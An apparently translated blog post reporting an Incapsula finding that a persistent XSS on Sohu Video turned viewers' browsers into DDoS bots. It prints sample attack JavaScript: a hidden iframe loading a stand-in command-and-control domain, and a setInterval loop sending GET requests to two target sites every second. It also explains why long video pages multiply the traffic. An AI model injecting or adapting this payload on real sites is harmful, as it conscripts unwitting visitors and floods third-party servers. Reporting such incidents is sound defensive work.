XSS attack: SOHU video XSS vulnerability causes its users to become DDOS bots

XSS, also known as CSS (Cross Site Script), is a Cross-Site scripting attack. A malicious attacker inserts malicious html code into a Web page. When a user browses this page, the html code embedded in the Web is executed, so as to achieve the Special Purpose of malicious attacks.

From: http://www.incapsula.com/blog/world-largest-site-xss-ddos-zombies.html

Incapsula finds that a customer has suffered DDos attacks at the application layer.

About 22000 of Internet users initiate 20 million GET requests to their websites.
This attack is a persistent XSS. By finding an xss with a large access volume and inserting a piece of js Code on its website, when its users access the website, users of the website can launch attacks against their victims.

Several sample codes:
// JavaScript Injection in tag enabled by Persistent XSS 
 

// Malicious JavaScript opens hidden <iframe> 
function ddos(url) { 
$("body").append("<iframe id='ifr11323' style='display:none;' src='http://c&cdomain.com/index.html'></iframe>"); } 

// Ajax DDoS tool in executes GET request every second 
<script> 
ddos('http://www.target1.com/1.jpg', 'http://www.target2.com/1.jpg'); 
function ddos(url,url2){ 
  window.setInterval(function (){ 
    $.getScript(url); 
    $.getScript(url2); 
      },1000) 
} 
</script> 
</body>
This attack method is very useful after finding the xss of a video website with a large access volume, because the average video time is not short, so that visitors can visit the video website to watch the video within the time period, without knowing it, attackers can use tools to send requests to their victim websites.
Sohu video was used this time, with 27 global website traffic rankings. xss code can be inserted in the video area to control the constant sending requests from users watching the video to victims.

Note: The attack results in the request of a url and a url specified by url2 every second. If a video lasts for 30 minutes, every user can send 1800 meaningless attack requests (such as cc) to the two targets during the video watching period, if tens of thousands of people watch a popular video...